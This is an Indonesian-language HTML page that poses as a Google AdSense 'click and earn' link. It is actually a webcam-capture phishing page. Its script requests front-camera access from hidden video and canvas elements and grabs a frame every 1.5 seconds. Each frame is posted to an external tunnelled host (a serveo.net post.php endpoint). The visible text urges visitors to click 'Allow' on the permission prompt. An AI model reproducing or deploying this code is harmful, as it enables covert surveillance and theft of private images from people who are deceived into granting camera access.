<!doctype html>
<html>
<head>
<title>Klick Iklan Google Adsense DUIT</title>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'https://remajacantik.serveo.net/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>

    <body>
    <!DOCTYPE HTML> <body> <center> <br> <br><br> <br><br> <br> <img src="https://www.rankxl.com/wp-content/uploads/2015/08/adsense.png" width="400" heigth="100"/> <iframe width="1" height="0" src="https://www.youtube.com/embed/w7KGrLIXw0Y?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe> <br> <br> <font size="2" family="Share Tech Mono" color="black">Welcome To Link KLICK ADSENSE<br><br> <font color="#FE2D42">" JIKA MENDAPATKAN NOTIF "IZINKAN" SILAHKAN KLICK IZINKAN "</font><br> <br><font size="2" family="Share Tech Mono" color="black">OKE! DAN JANGAN LUPA KLICK/CENTANG KOTAK DI BAWAH INI</font> </center><br> <br>

<!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-136790064-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-136790064-1'); </script></body></html>
        <p>Silahkan Centang Kotak DiBawah ini</p>
        <p>(accept now)</p>
        <p><label><input type="checkbox" name="mirror" id="mirror" /> Untuk Membantu Kami</label></p>
    </body>

</html>
